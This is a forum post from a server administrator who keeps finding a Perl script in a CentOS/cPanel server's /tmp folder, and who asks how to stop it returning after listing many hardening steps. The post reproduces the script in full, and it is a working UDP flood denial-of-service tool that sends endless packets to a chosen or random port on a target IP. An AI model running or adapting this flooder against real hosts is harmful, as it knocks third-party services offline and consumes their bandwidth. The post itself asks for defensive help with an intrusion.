udp.pl problem - bandwidth spikes

Code: 
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "if arg1/2 =0, randports/continous packets.\n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1];
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
I found udp.pl (above) in /tmp partition (cpanel / centos 4 server) a few times. I removed it, it is back there again somehow.

I have done so many security measures and now (although first after the security check) I found it there again, causing major bandwidth spikes.

Some security measures

APF
BFD
LSM
LEM
SECURED TMP, DVM, PARTITIONS
SSH PORT DIFFERENT NUMBER
DISABLED DIRECT ROOT LOGIN
CHANGED ROOT PASSWORD
DISABLED ALL SHELL ACCESS
MOD DOSEVASIVE
MOD DOSSECURITY
SIM

What to do to prevent this again?

 

 

 

 

Top